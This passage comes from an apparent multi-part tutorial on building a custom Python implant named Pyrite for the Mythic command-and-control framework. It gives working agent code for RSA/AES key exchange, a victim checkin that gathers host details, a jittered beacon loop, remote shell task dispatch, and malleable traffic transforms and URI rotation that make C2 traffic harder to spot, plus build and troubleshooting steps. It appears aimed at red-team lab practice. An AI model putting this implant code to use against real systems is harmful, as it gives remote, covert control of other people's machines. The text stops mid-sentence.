    Phase 1 — Mythic responds (encrypted with static AESPSK):
      Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
              "uuid":"<tempUUID>",
              "session_key":"<RSAPub(new_aes_key)>",
              "session_id":"<same 20char>"}) )

    RSA details from docs: 4096-bit, PKCS1_OAEP with SHA1.

    Returns (tempUUID, session_key_b64) for use in the subsequent checkin.
    Sets SESSION_KEY global.
    """
    global SESSION_KEY

    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP
    from Crypto.Hash import SHA1

    rsa_key     = RSA.generate(4096)
    pub_pem_b64 = base64.b64encode(
        rsa_key.publickey().export_key("PEM")
    ).decode("utf-8")
    session_id  = _gen_session_id(20)

    staging_msg = {
        "action":     "staging_rsa",
        "pub_key":    pub_pem_b64,
        "session_id": session_id,
    }

    # Send staging_rsa encrypted with static AESPSK using PAYLOAD_UUID
    response = send_message(PAYLOAD_UUID, staging_msg, use_get=False,
                            override_key=AESPSK)

    if response.get("action") != "staging_rsa":
        raise RuntimeError(f"Unexpected staging response: {response.get('action')}")
    if response.get("session_id") != session_id:
        raise RuntimeError("Session ID mismatch in staging response")

    temp_uuid       = response["uuid"]
    session_key_enc = base64.b64decode(response["session_key"])

    # Decrypt session key with our RSA private key
    # Per Mythic docs: PKCS1_OAEP with SHA1, 4096-bit
    cipher_rsa  = PKCS1_OAEP.new(rsa_key, hashAlgo=SHA1)
    session_key = cipher_rsa.decrypt(session_key_enc)
    SESSION_KEY = base64.b64encode(session_key).decode("utf-8")

    return temp_uuid, SESSION_KEY


def debug_startup() -> None:
    """
    Print stamped-in configuration at startup so the operator can immediately
    confirm what the builder produced — crypto mode, callback target, profile
    values — before any network activity happens.
    """
    print("\n" + "=" * 60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("=" * 60)
    print(f"  Callback:       {BASE_URL}")
    print(f"  Payload UUID:   {PAYLOAD_UUID}")
    print(f"  Interval:       {CALLBACK_INTERVAL}s  Jitter: {CALLBACK_JITTER}%")
    print(f"  Kill date:      {KILL_DATE_STR or '(none)'}")
    print()
    if AESPSK and USE_EKE:
        print(f"  AESPSK:         {AESPSK[:20]}...")
        print(f"  USE_EKE:        True")
        print(f"  Crypto mode:    EKE — staging_rsa exchange with AESPSK,")
        print(f"                  then per-session key negotiated via RSA")
    elif AESPSK:
        print(f"  AESPSK:         {AESPSK[:20]}...")
        print(f"  USE_EKE:        False")
        print(f"  Crypto mode:    Static PSK — AESPSK used directly for all traffic")
    else:
        print(f"  AESPSK:         (not set)")
        print(f"  USE_EKE:        False")
        print(f"  Crypto mode:    Plaintext — no encryption")
    print()
    print(f"  POST URIs:      {POST_URIS}")
    print(f"  POST location:  {POST_MSG_LOC}" + (f"  name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f"  POST xforms:    {[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f"  GET URIs:       {GET_URIS}")
    print(f"  GET location:   {GET_MSG_LOC}" + (f"  name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f"  GET xforms:     {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("=" * 60 + "\n", flush=True)


def do_checkin() -> str:
    """
    Perform the full checkin sequence and return the callbackUUID.

    Branches on USE_EKE and AESPSK — both stamped in at build time:
      USE_EKE=True  → staging_rsa exchange (AESPSK) → session key → checkin
      USE_EKE=False, AESPSK set → static PSK checkin directly with PAYLOAD_UUID
      USE_EKE=False, no AESPSK  → plaintext checkin with PAYLOAD_UUID

    All post-checkin messages use CALLBACK_UUID + SESSION_KEY (EKE),
    CALLBACK_UUID + AESPSK (static PSK), or CALLBACK_UUID plaintext.
    """
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))

    checkin_data = {
        "action":          "checkin",
        "ip":              get_ip(),
        "os":              platform.platform(),
        "user":            user,
        "host":            socket.gethostname(),
        "pid":             os.getpid(),
        "uuid":            PAYLOAD_UUID,
        "architecture":    arch,
        "domain":          "",
        "integrity_level": 2,
        "external_ip":     "",
        "encryption_key":  "",
        "decryption_key":  "",
    }

    if USE_EKE:
        print(f"[DEBUG] CHECKIN: EKE mode")
        print(f"[DEBUG]   Phase 1 — staging_rsa (key: AESPSK {AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG]   staging_rsa OK")
        print(f"[DEBUG]   tempUUID:    {temp_uuid}")
        print(f"[DEBUG]   SESSION_KEY: {session_key[:16]}... (negotiated at runtime, not in binary)")
        print(f"[DEBUG]   Phase 2 — checkin (outer UUID: tempUUID, key: SESSION_KEY)")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN: Static PSK mode (key: {AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print(f"[DEBUG] CHECKIN: Plaintext mode")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)

    if response.get("status") == "success":
        callback_uuid = response["id"]
        post_checkin_key = (
            "SESSION_KEY" if SESSION_KEY else
            "AESPSK"      if AESPSK else
            "plaintext"
        )
        print(f"[DEBUG] CHECKIN OK — callbackUUID: {callback_uuid}")
        print(f"[DEBUG]   All subsequent messages: {callback_uuid} + {post_checkin_key}", flush=True)
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")


# ─────────────────────────────────────────────────────────────────────────────
# Task Loop — Batched
# ─────────────────────────────────────────────────────────────────────────────

def queue_response(task_id: str, output: str,
                   completed: bool = True, status: str = "success") -> None:
    """
    Queue a task response to be sent on the next get_tasking call.

    Per the Mythic get_tasking docs, responses can be included directly
    in the get_tasking message rather than requiring a separate post_response,
    halving the number of round trips per sleep interval.
    """
    _pending_responses.append({
        "task_id":     task_id,
        "user_output": output,
        "completed":   completed,
        "status":      status,
    })


def queue_error(task_id: str, error_msg: str) -> None:
    # Per the post_response docs, status strings starting with "error:"
    # turn the status label red in the Mythic UI.
    queue_response(task_id, error_msg, completed=True,
                   status="error: " + error_msg)


def get_tasking() -> list:
    """
    Poll for all pending tasks and include any queued responses from the
    previous execution cycle in the same request.

    Per the Mythic get_tasking docs:
      tasking_size: -1  means return all pending tasks
      responses key     allows piggybacking results onto the tasking request
    """
    global _pending_responses

    msg = {
        "action":       "get_tasking",
        "tasking_size": -1,
    }

    if _pending_responses:
        msg["responses"] = _pending_responses
        _pending_responses = []

    # Use GET verb for get_tasking if the profile defines a GET block
    # with a different URI than the POST block. Otherwise use POST.
    use_get = (GET_URI != f"/{POST_URI}" and GET_URI != "/")
    return send_message(CALLBACK_UUID, msg, use_get=use_get).get("tasks", [])


# ─────────────────────────────────────────────────────────────────────────────
# Command Dispatch
# ─────────────────────────────────────────────────────────────────────────────

# ##COMMAND_CODE_INSERT##

COMMAND_MAP = {
    "shell": execute_shell,
    "exit":  execute_exit,
}


def dispatch_task(task: dict) -> None:
    task_id    = task["id"]
    command    = task["command"]
    raw_params = task.get("parameters", "")

    # Per the Mythic get_tasking docs, parameters is always a JSON string
    try:
        parsed = json.loads(raw_params) if raw_params else {}
    except json.JSONDecodeError:
        queue_error(task_id, f"Failed to parse task parameters: {raw_params!r}")
        return

    handler = COMMAND_MAP.get(command)
    if handler is None:
        queue_error(task_id, f"Unknown command: {command}")
        return

    try:
        if command == "exit":
            queue_response(task_id, "Exiting.")
            # Flush queued responses before exiting — os._exit() is immediate
            if _pending_responses:
                send_message(CALLBACK_UUID, {
                    "action":    "post_response",
                    "responses": _pending_responses,
                }, use_get=False)
            handler()
        else:
            queue_response(task_id, handler(parsed.get("command", "")))
    except Exception:
        queue_error(task_id, traceback.format_exc())


# ─────────────────────────────────────────────────────────────────────────────
# Sleep with Jitter
# ─────────────────────────────────────────────────────────────────────────────

def sleep_with_jitter(base_seconds: int, jitter_pct: int) -> None:
    jitter_range = base_seconds * (jitter_pct / 100.0)
    actual = base_seconds + random.uniform(-jitter_range, jitter_range)
    time.sleep(max(actual, 0.5))


# ─────────────────────────────────────────────────────────────────────────────
# Main Loop
# ─────────────────────────────────────────────────────────────────────────────

def main():
    global CALLBACK_UUID

    debug_startup()
    check_kill_date()

    while True:
        try:
            CALLBACK_UUID = do_checkin()
            break
        except Exception as e:
            print(f"[ERROR] Checkin failed: {e}", flush=True)
            traceback.print_exc()
            time.sleep(CALLBACK_INTERVAL)

    while True:
        check_kill_date()
        try:
            tasks = get_tasking()
            for task in tasks:
                dispatch_task(task)
        except Exception as e:
            print(f"[ERROR] Task loop: {e}", flush=True)
        sleep_with_jitter(CALLBACK_INTERVAL, CALLBACK_JITTER)


if __name__ == "__main__":
    main()

7. Generating an httpx Payload

  1. Edit pyrite_httpx.json to set your actual callback host and port in the UI fields (not in the file)
  2. In Mythic UI → Payloads → Generate New Payload
  3. Select pyrite, then select httpx as the C2 profile
  4. Upload pyrite_httpx.json when prompted for the profile config — this is required. Missing or malformed file produces Missing name for agent variation
  5. Fill in callback host, port, interval, jitter, and killdate in the remaining UI fields
For lab use keep the callback host as http://. Mythic-layer AES-256 encryption via mythic_encrypts = True protects message content regardless of whether transport TLS is used. Transport TLS requires the httpx server container to be configured with a certificate — refer to the httpx repository for that configuration.

8. Verifying the Changes

8.1 Debug Instrumentation

Add a debug_startup() call at the top of main() to print the stamped-in configuration before any network activity, so you can confirm what the builder produced:

def debug_startup() -> None:
    """Print stamped-in configuration so the operator can confirm what was built."""
    print("\n" + "="*60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("="*60)
    print(f"  Callback:       {BASE_URL}")
    print(f"  Payload UUID:   {PAYLOAD_UUID}")
    print(f"  Kill date:      {KILL_DATE_STR or '(none)'}")
    print()
    print(f"  AESPSK set:     {'YES — ' + AESPSK[:16] + '...' if AESPSK else 'NO (plaintext mode)'}")
    print(f"  USE_EKE:        {USE_EKE}")
    if AESPSK and USE_EKE:
        print(f"  Crypto mode:    EKE — staging_rsa exchange, then per-session key")
    elif AESPSK:
        print(f"  Crypto mode:    Static PSK — AESPSK used for all traffic")
    else:
        print(f"  Crypto mode:    Plaintext — no encryption")
    print()
    print(f"  POST URIs:      {POST_URIS}")
    print(f"  POST msg loc:   {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f"  POST transforms:{[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f"  GET URIs:       {GET_URIS}")
    print(f"  GET msg loc:    {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f"  GET transforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("="*60 + "\n")

Add a debug version of do_checkin that shows the EKE stages as they happen:

def do_checkin() -> str:
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))

    checkin_data = {
        "action":          "checkin",
        "ip":              get_ip(),
        "os":              platform.platform(),
        "user":            user,
        "host":            socket.gethostname(),
        "pid":             os.getpid(),
        "uuid":            PAYLOAD_UUID,
        "architecture":    arch,
        "domain":          "",
        "integrity_level": 2,
        "external_ip":     "",
        "encryption_key":  "",
        "decryption_key":  "",
    }

    if USE_EKE:
        print("[DEBUG] CHECKIN MODE: EKE")
        print(f"[DEBUG]   Step 1: staging_rsa exchange using static AESPSK ({AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG]   staging_rsa complete")
        print(f"[DEBUG]   tempUUID:    {temp_uuid}")
        print(f"[DEBUG]   SESSION_KEY: {session_key[:16]}... (negotiated, not in binary)")
        print(f"[DEBUG]   Step 2: checkin using tempUUID + SESSION_KEY")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN MODE: Static PSK ({AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print("[DEBUG] CHECKIN MODE: Plaintext")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)

    if response.get("status") == "success":
        callback_uuid = response["id"]
        print(f"[DEBUG] CHECKIN SUCCESS")
        print(f"[DEBUG]   callbackUUID: {callback_uuid}")
        print(f"[DEBUG]   All subsequent messages will use this UUID"
              + (" + SESSION_KEY" if SESSION_KEY else " + AESPSK" if AESPSK else " (plaintext)"))
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")

And the debug send_message which shows the active key at each call:

def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    active_key = override_key or SESSION_KEY or AESPSK

    json_body = json.dumps(payload).encode("utf-8")

    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body

    raw  = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)

    if use_get:
        transforms        = GET_TRANSFORMS
        server_transforms = GET_SERVER_TRANSFORMS
        url               = f"{BASE_URL}{random.choice(GET_URIS)}"
        msg_loc           = GET_MSG_LOC
        msg_name          = GET_MSG_NAME
        headers           = GET_HDRS
        method            = "GET"
    else:
        transforms        = POST_TRANSFORMS
        server_transforms = POST_SERVER_TRANSFORMS
        url               = f"{BASE_URL}{random.choice(POST_URIS)}"
        msg_loc           = POST_MSG_LOC
        msg_name          = POST_MSG_NAME
        headers           = POST_HDRS
        method            = "POST"

    encoded = apply_transforms(wire, transforms)

    # ── DEBUG: print BEFORE sending — visible even if connection fails ────────
    key_label = (
        f"EKE session ({SESSION_KEY[:16]}...)"  if SESSION_KEY else
        f"static PSK  ({AESPSK[:16]}...)"       if AESPSK and not override_key else
        f"override    ({override_key[:16]}...)" if override_key else
        "plaintext"
    )
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f"  outer UUID            : {uuid_str}")
    print(f"  action                : {payload.get('action', '?')}")
    print(f"  key used              : {key_label}")
    print(f"  raw before transforms : {raw[:80]}...")
    print(f"  wire (base64)         : {wire[:80]}...")
    print(f"  after profile xforms  : {encoded[:80]}...")
    print(f"  encoded head (20)     : {encoded[:20]}")
    print(f"  encoded tail (20)     : {encoded[-20:]}")
    print(f"  placement             : {msg_loc}" + (f" name={msg_name!r}" if msg_name else ""))

    raw_resp  = _place_message(method, url, encoded, msg_loc, msg_name, headers)
    decoded   = reverse_transforms(raw_resp, server_transforms)
    unwrapped = base64.b64decode(decoded + b'====')

    print(f"\n[DEBUG] INCOMING")
    print(f"  raw server response   : {raw_resp[:80]}...")
    print(f"  after reverse xforms  : {decoded[:80]}...")
    print(f"  after base64 decode   : {unwrapped[:80]}...")
    if active_key:
        print(f"  body is               : encrypted (will decrypt with {key_label})")
    else:
        print(f"  body is               : plaintext JSON")
    # ── END DEBUG ─────────────────────────────────────────────────────────────

    resp_body = unwrapped[36:]
    if not resp_body:
        raise RuntimeError("Empty response — check: sudo ./mythic-cli logs httpx")
    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)
    return json.loads(resp_body)

Update main() to call debug_startup():

def main():
    global CALLBACK_UUID

    debug_startup()    # ← print config before any network activity
    check_kill_date()
    ...

Example startup output for EKE mode (aes256_hmac + encrypted_exchange_check = true):

============================================================
[DEBUG] PYRITE STARTUP CONFIGURATION
============================================================
  Callback:       http://127.0.0.1:82
  Payload UUID:   bb0936fc-b373-462e-8548-52c9cd3614d6
  Kill date:      2027-04-07

  AESPSK set:     YES — ppnuO/i7+EB2HVao...
  USE_EKE:        True
  Crypto mode:    EKE — staging_rsa exchange, then per-session key

  POST URIs:      ['/data']
  POST msg loc:   body
  POST transforms:['base64']
  GET URIs:       ['/']
  GET msg loc:    body
  GET transforms: ['base64']
============================================================

[DEBUG] CHECKIN MODE: EKE
[DEBUG]   Step 1: staging_rsa exchange using static AESPSK (ppnuO/i7+EB2HVao...)

[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
  outer UUID            : bb0936fc-b373-462e-8548-52c9cd3614d6
  action                : staging_rsa
  key used              : static PSK  (ppnuO/i7+EB2HVao...)
  raw before transforms : b'bb0936fc-...<binary IV+cipher+HMAC>'...
  wire (base64)         : b'YmIwOTM2ZmMt...'...
  after profile xforms  : b'YmIwOTM2ZmMt...'...
  placement             : body

[DEBUG] INCOMING
  ...
  body is               : encrypted (will decrypt with static PSK)

[DEBUG]   staging_rsa complete
[DEBUG]   tempUUID:    303365-29d8-4d4c-...
[DEBUG]   SESSION_KEY: Xgjq3vE9vduJliEd... (negotiated, not in binary)
[DEBUG]   Step 2: checkin using tempUUID + SESSION_KEY

[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
  outer UUID            : 303365-29d8-4d4c-...
  action                : checkin
  key used              : EKE session (Xgjq3vE9vduJliEd...)
  ...

[DEBUG] CHECKIN SUCCESS
  callbackUUID: 558b6c3-2a38-4dfe-...
  All subsequent messages will use this UUID + SESSION_KEY

Example startup output for static PSK (aes256_hmac + encrypted_exchange_check = false):

  AESPSK set:     YES — ppnuO/i7+EB2HVao...
  USE_EKE:        False
  Crypto mode:    Static PSK — AESPSK used for all traffic

[DEBUG] CHECKIN MODE: Static PSK (ppnuO/i7+EB2HVao...)
[DEBUG] CHECKIN SUCCESS
  callbackUUID: e02388c8-cee5-45db-...
  All subsequent messages will use this UUID + AESPSK

Example startup output for plaintext (none):

  AESPSK set:     NO (plaintext mode)
  USE_EKE:        False
  Crypto mode:    Plaintext — no encryption

[DEBUG] CHECKIN MODE: Plaintext
[DEBUG] CHECKIN SUCCESS
  callbackUUID: 9d22506b-2dd1-4aff-...
  All subsequent messages will use this UUID (plaintext)

8.2 mythic_encrypts = False

With mythic_encrypts = Falsesend_message skips the mythic_encrypt/mythic_decrypt calls entirely and sends plaintext JSON — the same as Part 1. The httpx container forwards the bytes unchanged and Mythic processes them as plaintext. This requires the operator to select none for the AESPSK parameter, otherwise Mythic will try to decrypt the plaintext blob with the AES key and fail.

mythic_encrypts = False with custom crypto implemented in a translation container is Part 3.

8.3 Functional Verification

Verify the profile is being honoured: With pyrite_httpx.json (body + base64), the agent should POST to /data. Change the profile to location: "query" with name: "filter", regenerate, and confirm the agent sends GET /...?filter=<encoded> instead. This confirms the builder is correctly reading and stamping the profile values.

Verify batched tasking: Queue three shell commands in the Mythic UI before the agent beacons. All three tasks should arrive in a single get_tasking response and all three results piggybacked on the following beacon rather than three separate round trips.

SymptomLikely cause
Profile generates but agent gets empty responsehttpx container failed to load the profile config — check sudo ./mythic-cli logs httpx for Failed to read file from Mythic. Restart with sudo ./mythic-cli restart httpx
HMAC verification failed on checkinAlmost always caused by empty response body — fix the httpx container first
HTTP Error 404 on POST to /datahttpx container not running or profile config not loaded. Check logs and restart
Agent produces no output at allException being swallowed — ensure main() prints exceptions. Usually a missing pycryptodome or connection refused
Command files duplicated in generated agentBuilder insertion marker appeared twice in template — ensure template uses # ##COMMAND_CODE_INSERT## exactly once
Port stamped as 80 despite specifying a different portDomain regex failed to parse callback_domains — add debug print of callback_domains raw value in builder Step 2

9. Profile Compatibility and EKE

Complex Malleable Profiles

Our implementation handles the full transform pipeline — xorbase64base64urlprependappendnetbiosnetbiosu — in both directions. A profile like the Xenon apiclient.json example (message in a query parameter, multiple XOR+base64+prepend/append transforms, multi-URI rotation) works correctly because:

  • The agent applies client.transforms on top of the Mythic base64 wire format before sending
  • The agent reverses server.transforms after receiving to unwrap the response
  • URIs are selected randomly from the uris array per request
  • Message location (bodyqueryheadercookie) is fully implemented in _place_message

Encrypted Key Exchange

Our implementation uses RSA-based EKE per the Mythic checkin docs. When the operator selects aes256_hmac, the agent performs a two-phase startup instead of a direct checkin:

Phase 1 — do_staging_rsa() (uses static AESPSK, outer UUID = PayloadUUID):

Agent → Mythic:
  Base64( PayloadUUID + AES256(AESPSK,
    {"action":"staging_rsa", "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )

Mythic → Agent:
  Base64( PayloadUUID + AES256(AESPSK,
    {"action":"staging_rsa", "uuid":"<tempUUID>",
     "session_key":"<RSAPub(new_32_byte_aes_key)>",
     "session_id":"<same 20char>"}) )

The agent decrypts session_key with its RSA private key (PKCS1_OAEP, SHA1, 4096-bit) to get the negotiated AES session key. This is stored as SESSION_KEY.

Phase 2 — do_checkin() (uses SESSION_KEY, outer UUID = tempUUID):

Agent → Mythic:
  Base64( tempUUID + AES256(SESSION_KEY, {checkin_data}) )

Mythic → Agent:
  Base64( tempUUID + AES256(SESSION_KEY,
    {"action":"checkin", "id":"<callbackUUID>", "status":"success"}) )

All subsequent get_tasking and post_response messages use CALLBACK_UUID + SESSION_KEY. The static AESPSK embedded in the binary is only used during the staging exchange — an attacker who extracts the binary can only decrypt the staging messages, not the session traffic.

When the operator selects none, the agent falls through to a plaintext checkin directly with PAYLOAD_UUID — no EKE, no encryption.


10. Summary of Changes: Part 1 → Part 2

Part 1 (http)Part 2 (httpx)
Profilehttphttpx only
Transport (lab)HTTP plaintextHTTP plaintext (TLS optional)
Key exchangeNone — plaintextRSA EKE → per-session AES-256 key negotiated at runtime
Message encryptionNoneAES-256-CBC + HMAC-SHA256 using negotiated session key
mythic_encryptsFalseTrue
Static key in binaryN/AAESPSK used only for staging exchange, not session traffic
Tasks per beacon1All pending (tasking_size: -1)
Response round tripsSeparate post_responsePiggybacked on next get_tasking
Request shapingFixed POST bodyProfile-driven — URI, location, transforms from config file
URI rotationSingle URIRandom selection from uris array per request
Kill dateNot implementedChecked before each beacon

Continue to